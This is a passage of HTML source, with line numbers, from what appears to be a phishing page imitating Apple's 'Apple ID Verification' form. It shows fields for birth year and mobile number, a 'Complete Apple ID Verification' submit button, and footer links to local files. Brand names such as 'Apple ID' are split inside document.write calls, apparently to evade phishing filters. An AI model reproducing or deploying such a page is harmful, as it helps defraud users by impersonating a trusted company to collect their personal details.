<option value="1910">1910</option>
721
<option value="1909">1909</option></select>
722
<div id = 'dob' style="display:block">
723
724
725
726
</div>
727
728
729
730
</div>
731
<br/>
732
<label for="town-city">Mobile Number</label>
733
<span class="formwrap"><input id="mobnumber" value="" onkeypress="return isNumberKey(event)" maxlength="28" name="mobnumber" placeholder="What is your telephone number?" /></span> </p>
734
</div>
735
<h4>Email Preference</h4>
736
<p>
737
Stay up to date with Apple news, software updates, and the latest information about products and services from Apple. <a target="blank" class="more" href="http://www.apple.com/legal/privacy/">Read the Apple Customer Privacy Policy</a>
738
</p>
739
<div class="checkboxes hanging-indent">
740
<input class="checkbox" id="email" type="checkbox" name="newsletter" value="newsletter" checked="checked" />
741
<span class="info"><h6><label for="email">Apple News and Announcements</label></h6>Keep me up to date with Apple news, software updates, and the latest information on products and services.</span>
742
743
</div>
744
745
746
747
<div id = "bot-nav">
748
749
<!-- <a class="btn biggrey" href="#">
750
<span>Cancel</span>
751
</a> -->
752
753
<a class="btn bigblue">
754
<input class="btn bigblue" id="" type="submit" value="Complete Apple ID Verification" name="" />
755
</a>
756
757
758
</div>
759
</div>
760
<!-- /column -->
761
</div>
762
<!-- /grid2col -->
763
</div>
764
<!-- /content -->
765
</div>
766
767
<footer id="globalfooter">
768
769
<div id="breadory">
770
<ol id="breadcrumbs">
771
<li class="home"><a>Home</a></li>
772
773
<li> <a onClick="" href="#">My <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT></a> </li>
774
775
776
</ol>
777
</div>
778
<div class="gf-sosumi">
779
<p>Copyright &copy; 2014 <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' Inc') </SCRIPT> All rights reserved.</p>
780
<ul class="piped">
781
<li><a class="first" href="terms.html">Terms of Use</a></li>
782
<li><a href="privacy.html">Privacy Policy</a></li>
783
<li style="float:right">
784
<a class="choose" title="Choose your country or region" href="chooseyourcountry.html"><p style="display:inline;margin-right:-5px; padding-right:0px;"><SCRIPT TYPE="text/javascript"> document.write('Choose' + ' your') </SCRIPT> country or region</p><img class="img-22" src="images/usa.png" /></a></li>
785
786
</ul>
787
</div>
788
</footer>
789
790
791
792
</body>
793
</html>
794